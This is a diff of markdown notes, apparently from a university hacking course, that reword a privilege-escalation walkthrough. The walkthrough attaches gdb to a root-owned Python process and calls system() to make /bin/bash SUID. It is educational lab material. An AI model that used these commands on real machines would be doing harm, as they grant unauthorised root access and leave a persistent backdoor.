pojntfx/uni-hacking-notes/docs/main.md

 (gdb)
 ```

-We can now try and escalate with SUID (see https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/):
+I then tried to escalate by setting the SUID bits (see https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/):

 ```shell
 (gdb) call (void)system("chmod u+s /bin/bash")
 No symbol "system" in current context.
 ```

-But we can't, cause there are no debug symbols.
-Let's use a Python process instead:
+But wasn't able to, because there were no debug symbols.
+Python usually has them included:

 ```shell
 $ ps -U root -u root u | grep python root         719  0.0  0.8  26896 17940 ?
 Ss   07:10   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
 ```

-And attach GDB, then run SUID bits for bash using the process running as root:
+Attaching GDB allowed for setting the SUID bits for bash using the process running as root:

 ```shell
 $ gdb -p 719